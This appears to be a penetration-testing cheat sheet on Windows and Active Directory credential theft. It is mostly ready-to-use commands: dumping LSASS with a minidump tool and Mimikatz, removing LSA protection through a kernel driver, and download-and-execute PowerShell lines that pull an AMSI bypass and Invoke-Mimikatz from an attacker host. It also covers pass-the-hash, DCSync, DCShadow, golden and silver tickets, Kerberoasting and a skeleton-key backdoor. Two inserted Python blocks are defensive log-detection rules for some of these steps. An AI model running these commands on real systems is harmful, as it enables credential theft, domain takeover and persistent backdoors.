# Exfiltration

## PoC

Linux

```
cat proof.txt && whoami && hostname && ip addr
```

```
cat local.txt && whoami && hostname && ip addr
```

Windows

```
type proof.txt && whoami && hostname && ipconfig
```

```
type local.txt && whoami && hostname && ipconfig
```

## Catch the Flag

**Windows**

```
dir "\proof*.txt" /s

PS> gci -Recurse -Include FILENAME*
```

search for credentials or passwords in config and script files:

```
gci -path . -recurse -ea SilentlyContinue -Include *.txt,*.ini,*.yml,*.xml,*.ps1,*.cfg |select-string pass
```

**Linux**

```
find / -type f -iname "flag.txt" 2>/dev/null
```

## Dump Active Directory with PS

```
PS> Import-Module ActiveDirectory
PS> Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -Properties * | Select-Object SAMAccountName, Description, DistinguishedName
```

## Dump with dump.exe

Make sure you are able to access LSASS, or that you have already bypassed LSA Protection (see the Bypass LSA Protection section below).

<https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/MiniDump>

Build it with the Release, x64 configuration, then run it on the compromised host as NT AUTHORITY\SYSTEM.

The dump is written to <mark style="background-color:green;">`C:\Windows\Tasks\lsass.dmp`</mark>.


Then extract credentials from lsass.dmp on Kali Linux:

```
pypykatz lsa minidump lsass.dmp
```

or on a Windows machine:

```
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```


## Dump with Mimikatz

ref: <https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz>

cheatsheet: <https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49>

copy from: <https://kashz.gitbook.io/kashz-jewels/cheatsheet/mimikatz>

### Bypass LSA Protection

<https://blog.cyberadvisors.com/technical-blog/blog/credential-dumping-protections-part-2-bypass-lsa-protection>

{% hint style="info" %}
make sure mimikatz.sys is in the same folder as mimikatz.exe
{% endhint %}

If LSA Protection is enabled, a plain `sekurlsa::logonpasswords` fails with an error like this:

```
# detect LSA Protection
# <snip> ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <snip>
```

Run this command to remove the protection and dump credentials in one go:

```
.\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
```

### Bypass AV and LSA

{% hint style="info" %}
make sure the current shell is <mark style="background-color:red;">NT AUTHORITY\SYSTEM</mark>
{% endhint %}

Copy mimidrv.sys (the Mimikatz kernel driver, also shipped as mimikatz.sys) onto the target computer.

Then create a new kernel-mode service for it:

```
sc create mimidrv binPath= C:\windows\tasks\mimidrv.sys type= kernel start= demand
```

`[SC] CreateService SUCCESS`

Start the new service:

```
sc start mimidrv
```

Then you can load Mimikatz into memory with Invoke-Mimikatz:

```
# disable AMSI (amsi.txt is an AMSI bypass script hosted on the attacker machine)
(new-object system.net.webclient).downloadstring('http://192.168.x.y/amsi.txt') |IEX

# invoke-mimikatz with powershell
(new-object system.net.webclient).downloadstring('http://192.168.x.y/Invoke-Mimikatz.ps1') |IEX
```

Disable LSA Protection:

```
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
```

If successful:

```
# mimikatz(powershell) # !processprotect /process:lsass.exe /remove
# Process    : lsass.exe
PID 123     -> 00/00 [0-0-0]
```

Now you can interact with LSASS.
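Every step in the two LSASS sections above leaves a log trail: the dumper opens `lsass.exe` with read access (Sysmon Event ID 10, ProcessAccess), it writes `lsass.dmp` to disk (Sysmon Event ID 11, FileCreate), and `sc create ... type= kernel` produces a System log Event ID 7045 for a driver loaded from `C:\Windows\Tasks`. As an added example (not from this page or the linked projects), the Python below runs three detection rules over such events represented as dictionaries, the way a SIEM hands them to a rule engine. The allowlist of processes that may legitimately open LSASS, the writable-directory prefixes and the sample events are all constructed for the example; field names follow the Sysmon and System log schema, the values are invented to mirror the steps above.

```python
# Processes that legitimately open LSASS with broad access on a typical host.
# Hypothetical allowlist for this example; baseline it on your own fleet first.
LSASS_ACCESS_ALLOWLIST = {
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\services.exe",
    "c:\\program files\\windows defender\\msmpeng.exe",
}
PROCESS_VM_READ = 0x0010  # access bit a dumper needs to read LSASS memory
# Paths a non-admin or scheduled task can write to; a kernel driver loaded from
# one of them (as in the `sc create ... type= kernel` step above) is suspect.
WRITABLE_DIR_PREFIXES = ("c:\\windows\\tasks", "c:\\windows\\temp", "c:\\users\\",
                         "c:\\programdata\\", "c:\\temp")


def _norm(path):
    return path.strip().strip('"').lower()


def lsass_access_is_suspicious(ev):
    """Sysmon EID 10: a non-allowlisted process opened lsass.exe with VM_READ."""
    if ev.get("EventID") != 10 or not _norm(ev.get("TargetImage", "")).endswith("\\lsass.exe"):
        return False
    granted = int(ev.get("GrantedAccess", "0"), 16)
    return bool(granted & PROCESS_VM_READ) and _norm(ev.get("SourceImage", "")) not in LSASS_ACCESS_ALLOWLIST


def lsass_dump_file_created(ev):
    """Sysmon EID 11: a .dmp file whose name mentions lsass was written to disk."""
    if ev.get("EventID") != 11:
        return False
    name = _norm(ev.get("TargetFilename", ""))
    return name.endswith(".dmp") and "lsass" in name.rsplit("\\", 1)[-1]


def kernel_driver_from_writable_dir(ev):
    """System EID 7045: a kernel-mode driver service whose image lives in a user-writable path."""
    if ev.get("EventID") != 7045 or "kernel" not in ev.get("ServiceType", "").lower():
        return False
    return _norm(ev.get("ImagePath", "")).startswith(WRITABLE_DIR_PREFIXES)


RULES = [
    ("lsass_read_access", lsass_access_is_suspicious, "SourceImage"),
    ("lsass_dump_on_disk", lsass_dump_file_created, "TargetFilename"),
    ("kernel_driver_writable_path", kernel_driver_from_writable_dir, "ImagePath"),
]


def triage(events):
    """Return [(rule name, offending field value)] for every matching event, in input order."""
    hits = []
    for ev in events:
        for rule, check, field in RULES:
            if check(ev):
                hits.append((rule, ev.get(field, "")))
    return hits


# Constructed sample events: field names follow the Sysmon / System log schema,
# the values are invented to mirror the steps on this page.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": "C:\\Windows\\Tasks\\dump.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": "C:\\Windows\\system32\\wininit.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": "C:\\Windows\\system32\\svchost.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 11, "Image": "C:\\Windows\\Tasks\\dump.exe",
     "TargetFilename": "C:\\Windows\\Tasks\\lsass.dmp"},
    {"EventID": 7045, "ServiceName": "mimidrv", "ImagePath": "C:\\windows\\tasks\\mimidrv.sys",
     "ServiceType": "kernel mode driver", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "VendorNic", "ImagePath": "C:\\Windows\\System32\\drivers\\vendornic.sys",
     "ServiceType": "kernel mode driver", "StartType": "auto start"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

The third sample event shows why the rule keys on the `GrantedAccess` bitmask rather than on "anything touching lsass": a `0x1000` (query limited information) open is routine and never yields a dump. Renaming `dump.exe` or the output file defeats the name-based rules but not the access-mask or driver-path ones, which is the reason to run all three together.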

### <mark style="color:red;">**\[Important to start first]**</mark> **Test Mimikatz**

```
privilege::debug
# Privilege '20' OK => Working properly
```

### **Password / hashes**

```
# dump logon users' passwords or NTLM hashes
sekurlsa::logonpasswords

# dump hashes
lsadump::sam
lsadump::lsa [/inject | /patch]
# crack offline: hashcat -m 1000 <hash>
```

### **Escalate privilege using NTLM Hash**

ref: <https://www.youtube.com/watch?v=NeY7OiQTRK8>

```
# take the NTLM hash of Administrator from sekurlsa::logonpasswords, then spawn cmd with it
sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<ntlm hash> /run:cmd
```

### **DCSync (Privilege Escalation AD)**

<mark style="color:yellow;">\[requirement]</mark> the user must hold these rights on the domain object:

* Replicating Directory Changes
* Replicating Directory Changes All

```
lsadump::dcsync /user:krbtgt
lsadump::dcsync /user:administrator
```

### <mark style="color:orange;">**\[recommended to start]**</mark> **Elevate shell integrity**

```
# use this with evil-winrm, which only gives a medium-integrity shell
token::elevate
```

### **DCshadow**

```
#simple poc
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:description /value:"modified dcshadow"
```

#### **Attack DCshadow and DCsync (persistence domain admin / AD Attribute Takeover)**

<https://www.elladodelmal.com/2018/03/dcshadow-y-dcsync-enganando-al-domain.html>

Use case:

* Bypass MFA

```
# stage the attribute change on the rogue "DC"
token::elevate
lsadump::dcshadow /object:CN=administrator,CN=users,DC=hackers,DC=local /attribute:telephoneNumber /value:"123-123-223"

# from a second, elevated mimikatz shell, push the change to the real DC
lsadump::dcshadow /push
```
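Both the DCSync section and the DCShadow section above are visible in the Security log of the domain controller, and the requirements the page lists are exactly what a defender keys on: DCSync exercises the two replication rights as a Control Access operation on the domain object (Event ID 4662, with the extended-right GUIDs in the Properties field), and a DCShadow push needs the rogue host's computer account to carry a `GC/` service principal name so it is accepted as a domain controller (Event ID 4742, computer account changed). As an added example (not from this page or any project it cites), the Python below flags either when the acting or modified account is not in the inventory of real domain controllers. The replication-right GUIDs are the published Active Directory values; the DC inventory `KNOWN_DC_ACCOUNTS` and the sample events are constructed for the example, using the `hackers.local` lab domain from the page.

```python
# Extended-right GUIDs a DCSync needs; these are the published Active Directory schema GUIDs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Computer accounts of the real domain controllers (hypothetical inventory for this example).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}


def replication_rights_in(properties):
    """Names of the replication rights that appear in a 4662 'Properties' field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def dcsync_suspect(ev):
    """Event 4662: replication rights exercised by an account that is not a known DC.
    Returns (actor, [rights]) or None."""
    if ev.get("EventID") != 4662:
        return None
    rights = replication_rights_in(ev.get("Properties", ""))
    actor = ev.get("SubjectUserName", "")
    if not rights or actor in KNOWN_DC_ACCOUNTS:
        return None
    return actor, rights


def dcshadow_suspect(ev):
    """Event 4742: a computer account outside the DC inventory carries a GC/ SPN,
    which a DCShadow push needs in order to pose as a domain controller.
    Returns (account, [gc spns]) or None."""
    if ev.get("EventID") != 4742:
        return None
    target = ev.get("TargetUserName", "")
    if target in KNOWN_DC_ACCOUNTS:
        return None
    spns = ev.get("ServicePrincipalNames", "").replace("\n", ",").split(",")
    gc = [s.strip() for s in spns if s.strip().upper().startswith("GC/")]
    return (target, gc) if gc else None


def triage(events):
    """Return [(rule, account, details)] for every matching event, in input order."""
    hits = []
    for ev in events:
        for rule, check in (("dcsync", dcsync_suspect), ("dcshadow_gc_spn", dcshadow_suspect)):
            hit = check(ev)
            if hit:
                hits.append((rule, hit[0], hit[1]))
    return hits


# Constructed sample events (Security log field names; values invented for the lab domain hackers.local).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "Read Property\n\t{00000000-0000-0000-0000-000000000000}"},  # placeholder, not a replication right
    {"EventID": 4742, "TargetUserName": "WS-ALICE$",
     "ServicePrincipalNames": "HOST/ws-alice.hackers.local, GC/ws-alice.hackers.local/hackers.local"},
    {"EventID": 4742, "TargetUserName": "DC01$",
     "ServicePrincipalNames": "GC/dc01.hackers.local/hackers.local, ldap/dc01.hackers.local"},
    {"EventID": 4742, "TargetUserName": "WS-BOB$", "ServicePrincipalNames": "HOST/ws-bob.hackers.local"},
]

if __name__ == "__main__":
    for rule, account, details in triage(SAMPLE_EVENTS):
        print(f"{rule:16} {account:12} {', '.join(details)}")
```

Keep `KNOWN_DC_ACCOUNTS` in sync with the Domain Controllers OU rather than hand-maintained; a stale inventory after a DC promotion is the usual source of false positives for the 4742 rule, and the same list is what you audit when reviewing who holds the two replication rights in the first place.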

### **Golden / Silver Ticket**

```
# dump hash and SID
lsadump::lsa /inject /name:[krbtgt | DOMAIN_ADMIN_ACCOUNT | SERVICE_ACCOUNT]

# create golden ticket and pass-the-ticket
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt
# create silver ticket and pass-the-ticket (service account hash goes in /rc4, scoped to one host and service)
kerberos::golden /user:<USER> /domain:DOMAIN /sid:SID /target:TARGET_FQDN /service:cifs /rc4:SERVICE_NTLM_HASH /id:1103 /ptt

# check
misc::cmd
net use \\IP\c$ [/user:USER PASS]
dir \\IP\c$
PsExec.exe \\IP cmd.exe

# Kerberoasting attack
# ref: https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html
kerberos::list /export
# tickets are exported to the working directory (C:\kerberoast in the ref); crack them with tgsrepcrack.py
```

### **Kerberos Skeleton key**

Installs a backdoor into LSASS memory on the domain controller so that every user can also authenticate with the master password `mimikatz` (existing passwords keep working).

Note: the backdoor lives only in memory; it does not survive a reboot of the machine.

```
misc::skeleton

# done, now access admin shares with the skeleton password
> net use \\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
> net use \\Desktop-1\c$ /user:Machine1 mimikatz
> dir \\Desktop-1\c$
```

## Get DNS Zone

```
cd C:\Windows
PS> gci -Recurse -Include <DOMAIN>*
```

Online request server (catches HTTP requests): <https://beeceptor.com/>

